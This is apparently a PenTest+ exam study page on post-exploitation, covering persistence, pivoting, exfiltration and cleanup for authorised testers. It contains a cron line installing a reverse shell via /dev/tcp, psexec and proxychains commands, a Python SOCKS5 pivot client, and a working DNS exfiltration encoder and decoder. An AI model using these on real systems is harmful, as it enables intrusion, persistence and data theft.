CompTIA PenTest+ (PT0-003): Post-exploitation and Lateral Movement

Post-exploitation and Lateral Movement is 14% of the CompTIA PenTest+ (PT0-003) exam. This module covers what you do after the first foothold: keep your access, move deeper into the network, move data out within the rules of engagement, and clean up. The first shell is rarely the goal. The real value is showing how far an attacker can go from one weak point.
You take the access you earned in Attacks and Exploits and demonstrate real business impact. A single compromised workstation that leads to domain admin and the customer database is a far stronger finding than a list of unpatched servers.
Persistence
Persistence keeps your access alive after a reboot, a logout, or a patch. You demonstrate it so the client understands how an attacker stays in even after the initial hole is closed.
| Technique | How it persists |
|---|---|
| Scheduled tasks / cron jobs | Re-run your payload on a timer |
| New accounts | A backdoor user you control |
| Registry keys | Run keys that launch on Windows startup |
| Reverse and bind shells | Call-back or listening shells for re-entry |
| C2 frameworks | Command-and-control beacons like Sliver or Cobalt Strike |
| Rootkits and backdoors | Deeply hidden, persistent access |
You add a Linux cron job that calls back to your listener (10.0.0.5:4444 here) every five minutes. The subshell appends to the existing crontab instead of replacing it, and the 2>/dev/null hides the error crontab -l prints when the user has no crontab yet:
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'") | crontab -
Document every persistence mechanism you create. You remove all of them during cleanup.
Lateral Movement
Lateral movement is how you spread from your first host to the rest of the network. You pivot through a compromised host to reach systems you could not touch directly, dump credentials, and discover new services across SMB, RDP, SSH, LDAP, and RPC.
You tunnel your tools through a compromised host with Proxychains and a dynamic SSH tunnel. The -D flag opens a SOCKS proxy on your machine at port 1080; point proxychains at 127.0.0.1:1080 in its config (the default entry is Tor's 9050). Only TCP connections pass through a SOCKS proxy, so nmap must use a full connect scan (-sT) and skip host discovery (-Pn); SYN, UDP, and ping scans do not traverse the tunnel:
ssh -D 1080 user@10.0.0.5
proxychains nmap -sT -Pn 10.0.1.0/24
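What proxychains does for each connection is a SOCKS5 handshake with the ssh -D listener. The added example below (not code from the course page) writes that handshake out so a custom tool can pivot through the tunnel without proxychains. The proxy address 127.0.0.1:1080, the target 10.0.1.20:445 and the name dc01.corp.local are assumptions. The point to notice is that a hostname is sent as a SOCKS domain address, so the pivot host resolves it rather than your attack box, which is what keeps internal names from leaking into your own DNS traffic.

```python
"""Open a TCP connection through the SOCKS5 proxy that `ssh -D 1080` exposes.

Added example, not from the course page. Proxy and destination addresses
below are assumptions; OpenSSH's -D proxy accepts the 'no authentication'
method only, which is all this client offers.
"""
import socket
import struct

SOCKS_VERSION = 5
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04

REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def build_greeting() -> bytes:
    """Client hello: version 5, one method offered, method 0 (no auth)."""
    return bytes([SOCKS_VERSION, 1, NO_AUTH])


def build_connect(host: str, port: int) -> bytes:
    """CONNECT request. Literal IPs go as ATYP 1/4; anything else is sent as a
    domain name (ATYP 3) so the far end of the tunnel does the DNS lookup."""
    try:
        atyp, encoded = ATYP_IPV4, socket.inet_pton(socket.AF_INET, host)
    except OSError:
        try:
            atyp, encoded = ATYP_IPV6, socket.inet_pton(socket.AF_INET6, host)
        except OSError:
            raw = host.encode("idna")
            if len(raw) > 255:
                raise ValueError("hostname too long for a SOCKS5 domain address")
            atyp, encoded = ATYP_DOMAIN, bytes([len(raw)]) + raw
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, atyp]) + encoded + struct.pack("!H", port)


def parse_connect_reply(data: bytes) -> tuple[int, str, int]:
    """Return (status, bound_host, bound_port) from the server's CONNECT reply."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    status, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntop(socket.AF_INET, data[4:8]), data[8:]
    elif atyp == ATYP_IPV6:
        host, rest = socket.inet_ntop(socket.AF_INET6, data[4:20]), data[20:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, rest = data[5:5 + n].decode("ascii"), data[5 + n:]
    else:
        raise ValueError(f"unknown address type {atyp}")
    if len(rest) < 2:
        raise ValueError("truncated reply")
    return status, host, struct.unpack("!H", rest[:2])[0]


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        part = sock.recv(n - len(buf))
        if not part:
            raise ConnectionError("proxy closed the connection")
        buf += part
    return buf


def open_through_socks(proxy: tuple[str, int], dest: tuple[str, int]) -> socket.socket:
    """Do the handshake and hand back a socket that now talks to dest via the pivot."""
    sock = socket.create_connection(proxy)
    sock.sendall(build_greeting())
    ver, method = recv_exact(sock, 2)
    if ver != SOCKS_VERSION or method != NO_AUTH:
        sock.close()
        raise ConnectionError("proxy did not accept the no-auth method")
    sock.sendall(build_connect(*dest))
    head = recv_exact(sock, 4)
    if head[3] == ATYP_IPV4:
        tail = recv_exact(sock, 4 + 2)
    elif head[3] == ATYP_IPV6:
        tail = recv_exact(sock, 16 + 2)
    else:
        n = recv_exact(sock, 1)
        tail = n + recv_exact(sock, n[0] + 2)
    status, _, _ = parse_connect_reply(head + tail)
    if status != 0:
        sock.close()
        raise ConnectionError(REPLY_TEXT.get(status, f"status {status}"))
    return sock


if __name__ == "__main__":
    # Assumes `ssh -D 1080 user@10.0.0.5` is already running on this machine.
    s = open_through_socks(("127.0.0.1", 1080), ("10.0.1.20", 445))
    print("connected to 10.0.1.20:445 through the pivot from", s.getsockname())
    s.close()
```

Because the proxy only understands CONNECT, this is also why the nmap line above needs -sT and -Pn: there is no SOCKS request for a raw SYN or an ICMP echo.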
You execute commands across Windows hosts with Impacket's psexec. It uploads a service executable to the ADMIN$ share and registers a service, so it is loud in the event logs; wmiexec from the same package runs over WMI without dropping a binary. Both accept -hashes LMHASH:NTHASH in place of the password for pass-the-hash:
impacket-psexec domain/user:password@10.0.1.20
| Tool | Lateral movement use |
|---|---|
| LOLBins | Built-in tools to blend in |
| CrackMapExec | Spray credentials across many hosts |
| Impacket | psexec, wmiexec, secretsdump |
| Netcat | Relays and simple shells |
| sshuttle | Transparent VPN-like pivoting over SSH |
| Proxychains | Route any tool through a proxy or tunnel |
| Metasploit | Routing, pivoting, and post modules |
| PsExec | Remote execution on Windows |
| Mimikatz | Dump credentials from LSASS and reuse them with pass-the-hash |
Staging and Exfiltration
Staging collects the data you want in one place, then exfiltration moves it out without tripping alarms. You demonstrate the data theft an attacker would perform, using file encryption to protect what you move and covert channels to hide it.
| Covert channel | How it hides data |
|---|---|
| DNS | Encode data in DNS queries |
| ICMP | Smuggle data inside ping packets |
| HTTPS | Blend exfil traffic into normal web traffic |
This section also covers steganography (hiding data inside images or other files) and cloud storage as a drop point. Only exfiltrate test data or approved files, never real customer records beyond what the rules of engagement allow.
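The DNS row of the table says "encode data in DNS queries"; the added example below (not code from the course page) shows what that encoding has to respect: 63-byte labels, a 253-byte name, and case-insensitive resolvers, which is why it uses base32 rather than base64. The zone files.example.net, the session label and the sample payload are assumptions; in a real run each name would be issued as a query that eventually reaches the authoritative server you control, and the decoder would read the names from that server's query log.

```python
"""Carry a file out over DNS query names and put it back together on the receiving side.

Added example, not from the course page. The zone, the session label and the
payload in the test are assumptions for illustration.
"""
import base64
import hashlib

EXFIL_DOMAIN = "files.example.net"  # assumed attacker-controlled zone
MAX_LABEL = 63                       # RFC 1035: a label is at most 63 octets
MAX_NAME = 253                       # RFC 1035: a whole name is at most 253 octets
CHUNK = 90                           # bytes per query: a multiple of 5, so base32 emits
                                     # 144 chars with no padding, fitting in three labels


def _b32(chunk: bytes) -> str:
    # base32 rather than base64: DNS is case-insensitive and resolvers may rewrite case
    return base64.b32encode(chunk).decode("ascii").rstrip("=").lower()


def encode_queries(data: bytes, session: str, domain: str = EXFIL_DOMAIN) -> list[str]:
    """One query name per chunk, then a 'done' record carrying the chunk count and SHA-256.

    Layout: <seq>.<session>.<b32 label>[.<b32 label>...].<domain>
            done.<session>.<chunk count>.<sha256 hi>.<sha256 lo>.<domain>
    The digest is split in two because 64 hex chars exceed one label.
    """
    names = []
    n_chunks = (len(data) + CHUNK - 1) // CHUNK
    for seq in range(n_chunks):
        text = _b32(data[seq * CHUNK:(seq + 1) * CHUNK])
        labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
        name = ".".join([f"{seq:05d}", session, *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError(f"query name too long: {len(name)} chars")
        names.append(name)
    digest = hashlib.sha256(data).hexdigest()
    names.append(".".join(["done", session, str(n_chunks), digest[:32], digest[32:], domain]))
    return names


def decode_queries(names: list[str], session: str, domain: str = EXFIL_DOMAIN) -> bytes:
    """Reassemble from observed query names.

    Tolerates duplicates and arbitrary order (retries and caching resolvers
    produce both) and refuses to return a partial or corrupted file.
    """
    suffix = "." + domain
    chunks: dict[int, bytes] = {}
    expected = digest = None
    for name in names:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        if len(labels) < 3 or labels[1] != session:
            continue
        if labels[0] == "done":
            if len(labels) == 5:
                expected, digest = int(labels[2]), labels[3] + labels[4]
            continue
        text = "".join(labels[2:]).upper()
        text += "=" * (-len(text) % 8)  # restore the padding stripped on send
        chunks[int(labels[0])] = base64.b32decode(text)
    if expected is None or set(chunks) != set(range(expected)):
        raise ValueError("transfer incomplete: missing 'done' record or chunks")
    data = b"".join(chunks[i] for i in range(expected))
    if hashlib.sha256(data).hexdigest() != digest:
        raise ValueError("checksum mismatch")
    return data
```

The names this produces are exactly what a defender looks for: long high-entropy labels and a burst of unique queries to one zone. Tooling that wants to stay quiet spreads the queries over time and across names, which is the trade-off between speed and staying under the alarm threshold the section opens with.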
Cleanup and Restoration
A professional leaves the environment as they found it. Cleanup and restoration is an ethical and contractual requirement, not an afterthought.
- Remove every persistence mechanism you created
- Revert configuration changes back to the original state
- Remove tools, payloads, and scripts you uploaded
- Preserve artifacts and logs needed for the report
- Perform secure data destruction of any client data you collected
You keep a running log of every change you make so cleanup is complete and verifiable. A leftover backdoor account is a finding against you, and it can become a real attacker’s entry point.
Next Steps
You finished the technical phases. Fold these results into the report you planned in Engagement Management, where the attack narrative ties your foothold, lateral movement, and impact into one story for the client. Review Attacks and Exploits to strengthen your initial access skills, and return to the CompTIA PenTest+ Course to finish the path. Before exam day, read tips for passing CompTIA exams.

